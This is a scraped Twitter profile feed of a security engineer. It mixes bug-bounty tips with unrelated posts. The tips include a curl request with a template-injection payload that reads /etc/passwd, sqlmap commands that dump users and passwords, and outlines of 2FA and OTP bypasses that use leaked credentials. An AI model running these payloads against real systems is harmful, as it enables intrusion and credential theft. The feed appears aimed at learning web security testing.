Abdalla Abdelrhman(@0x2nac0nda) 's Twitter Profileg
Abdalla Abdelrhman

@0x2nac0nda

Security Engineer | Web & Mobile Security | Binary Exploitation | Code review (PHP, Java,Python) | Code | Digital Forensics | #HTB | #CTF Player

ID:1212821619032199168

calendar_today02-01-2020 19:43:23

856 Tweets

2,2K Followers

453 Following

The XSS Rat - Uncle Rat ❤️(@theXSSrat) 's Twitter Profile Photo

100 web vulnerabilities, categorized into various types:

Injection Vulnerabilities:
1. SQL Injection (SQLi)
2. Cross-Site Scripting (XSS)
3. Cross-Site Request Forgery (CSRF)
4. Remote Code Execution (RCE)
5. Command Injection
6. XML Injection
7. LDAP Injection
8. XPath

account_circle
Maحmoud🇪🇬🇵🇸(@Ma7mood_a4raf) 's Twitter Profile Photo

ومَا مِن دَابَّةٍ فِي الْأَرْضِ ولا طائر يطير بجناحيه إلا أمم أمْثَالَكُم ✨

account_circle
𝐑𝐀𝐢𝐡𝐚𝐧 ✪(@zapstiko) 's Twitter Profile Photo

Admin panel pwn~ Ahsan Khan

1. Found credentials on dehashed.com
2. Applied on admin.site.com = Protected with OTP
3. Bypassed using API
4. admin.site.com/api/login?user…

Admin panel pwn~ @hunter0x7 1. Found credentials on dehashed.com 2. Applied on admin.site.com = Protected with OTP 3. Bypassed using API 4. admin.site.com/api/login?user…
account_circle
Abdalla Abdelrhman(@0x2nac0nda) 's Twitter Profile Photo

to :

curl -X POST test.com:8080 -H 'Cookie: token=eyJhbGciOiJI5cCI6Ikp.eyJ1c2VybmFtZSI6IndpemFyZC5vn0.YuW5qoU_-3FQ6q5wyFPw3PFlDHDOjuu2k' --data 'name=name&desc={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}'

account_circle
0xRAYAN(@0xRAYAN7) 's Twitter Profile Photo

Below is the best extensions I used in VScode :

1- Prettier - Code formater
2- Auto Rename Tag
3- Atom One Dark Them
4- MySQL ( authored by : cweijan)
5-SQLite

account_circle
مالك الدوسري/Malek Aldossary(@MAlajab) 's Twitter Profile Photo

الإرهاق الوظيفي و
تغريدة تلخص لك أبرز التحديات في المجال
العمل في المجال التقني، وبالأخص ، وذلك بسبب التحديات والتطلعات والآمال الكبيرة الموضوعة على عاتق المختصين مما يسبب لهم الإرهاق.

الإرهاق الوظيفي و #الامن_السيبراني تغريدة تلخص لك أبرز التحديات في المجال العمل في المجال التقني، وبالأخص #الأمن_السيبراني، وذلك بسبب التحديات والتطلعات والآمال الكبيرة الموضوعة على عاتق المختصين مما يسبب لهم الإرهاق. #يتبع
account_circle
Abdalla Abdelrhman(@0x2nac0nda) 's Twitter Profile Photo

Google Authenticator
Steps:
1. Set-up Google Authenticator for 2FA
2. Now, 2FA is enable
3. Games on password reset page and change your password
4. If you are website redirect you to your dashboard, then 2FA (google Authenticator) is bypassed


account_circle
Justin Gardner(@Rhynorater) 's Twitter Profile Photo

I've made over 100k on SSRF vulnerabilities.

They aren't always as simple as pointing it at localhost or AWS Metadata service.

Here are some tricks I've picked up over the past 5 years of web app testing:

I've made over 100k on SSRF vulnerabilities. They aren't always as simple as pointing it at localhost or AWS Metadata service. Here are some tricks I've picked up over the past 5 years of web app testing:
account_circle
Abdalla Abdelrhman(@0x2nac0nda) 's Twitter Profile Photo

Custom injection in / / /

python sqlmap.py -u 'example.com' --data 'username=admin&password=pass' --headers='x-forwarded-for:127.0.0.1*' The injection is located at the '*'

account_circle
Abdalla Abdelrhman(@0x2nac0nda) 's Twitter Profile Photo

Basic arguments for map
sqlmap --url='<url>' -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs

account_circle